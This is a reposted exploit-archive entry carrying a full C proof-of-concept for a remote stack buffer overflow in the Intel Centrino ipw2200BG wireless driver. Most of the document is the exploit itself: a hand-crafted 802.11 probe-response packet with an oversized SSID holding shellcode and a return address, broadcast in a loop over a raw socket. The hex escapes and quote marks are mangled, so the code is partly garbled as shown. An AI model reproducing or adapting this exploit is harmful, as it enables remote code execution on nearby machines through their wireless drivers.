‘Intel Centrino ipw2200BG Wireless Driver Buffer Overflow (Exploit)’

Summary

A buffer overflow vulnerability has been discovered in the Intel Centrino ipw2200 integrated wireless card driver.’

Credit:

‘The original article can be found at:
http://www.milw0rm.com/exploits/3158


Details

Exploit:
/*
 * This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card.
 *
 * Author:
 * Giuseppe Gottardi (aka oveRet) <overet@securitydate.it>
 * Senior Security Engineer at Communication Valley S.p.A.
 *
 * This version of code is only a Proof of Concept stack based exploit that demonstrates
 * the remote code execution on ipw2200 driver. It execute a beep user space shellcode.
 *
 * It only works on XP SP2 ITA and it was only tested with 8.0.12.20000 version of
 * IPW2200BG driver.
 *
 * Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.
 *
*/

#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

//#define DEBUG
#define DEV ‘wlan0’
#define DELAY 0.1

char wifi_packet[]=
‘x50’
‘x00’
‘x3ax01’
‘x00x0ex35x95x7bx45’ //DSTMAC
‘x00x01x02x03x04x05’
‘x00x01x02x03x04x05’
‘xc0x31’
‘x14x3ax25x02x00x00x00x00’
‘xa0x0f’
‘x31x08’
‘x00x9c’ //SSID len
‘xebx38xbbx01x03xdfxffx4bxfcx8dx7bx7cx5ex6ax17x59’
‘xf3xa5xbfx7cx03xfex7fx39x3bx74x09x8bx03x8dx4bx08’
‘x89x01x89x3bx31xc0x64xc6x40x24x02x8bx1dx1cxf0xdf’
‘xffxb8xc7xc0x4dx80x6ax00xffxe0xe8xc3xffxffxffx60’
‘x6ax30x58x99x64x8bx18x39x53x0cx74x26x8bx5bx10x8b’
‘x5bx3cx83xc3x28x8bx0bx03x4bx03x81xf9x6cx61x73x73’
‘x75x10x64x8bx18x43x43x43x80x3bx01x74x05xc6x03x01’
‘xebx07x61xffx25x08x03xfex7fx55x89xe5x83xecx18xc7’
‘x45xfcx53x8ax83x7cxc7x44x24x04xd0x03x00x00xc7x04’
‘x24x01x0ex00x00x8bx45xfcxffxd0xc9xc3’
‘x01x04x82x84x8bx96’
‘x03x01x05’
‘x85x1ex00x00x86x00x1fx00xffx03x19x00x61x70x00x00’
‘x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x06’
‘xddx18x00x50xf2x01x01x00x00x50xf2x02x01x00x00x50’
‘xf2x02x01x00x00x50xf2x02x28x00’
‘xddx06x00x40x96x01x01x00’
‘xddx05x00x40x96x03x04’
‘xddx16x00x40x96x04x00x09x07xa5x00x00x23xa5x00x00’
‘x42x54x00x00x62x43x00x00’
‘xddx05x00x40x96x0bx01’
‘xddx18x00x50xf2x02x01x01x89x00x03xa5x00x00x27xa5’
‘x00x00x42x54xbcx00x62x43x66x00’
‘xddx10x00x50xf2x05x00x01x00x04x00x00x83x07’
‘x5axf0x54x80’; //RET address

int send_probe_response(char *dev)
{
        struct sockaddr sa;
        int sockfd;
        int rc;

#ifdef DEBUG
        int i;
        u_char *moe = wifi_packet;
#endif /* DEBUG */

        memset(&sa, 0, sizeof(struct sockaddr));

        sa.sa_family = PF_PACKET;
        memcpy(sa.sa_data, dev, sizeof(sa.sa_data));

#ifdef DEBUG
        for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
                if (!(i%32)) printf(‘n’);
                printf(‘%02x ‘, *moe);
        }
        printf(‘n’);
#endif /* DEBUG */

        if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
                perror(‘socket’);
                return -1;
        }

        if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
                close(sockfd);
                perror(‘sendto’);
                return -1;
        }

        close(sockfd);
        return rc;
}

int main(int argc, char *argv[])
{
        int rc;

        printf(‘waiting for beep shellcode execution…n’);

        for (;;) {
                rc = send_probe_response(DEV);
                sleep(DELAY);
        }

        return 0;
}’

Categories: Exploits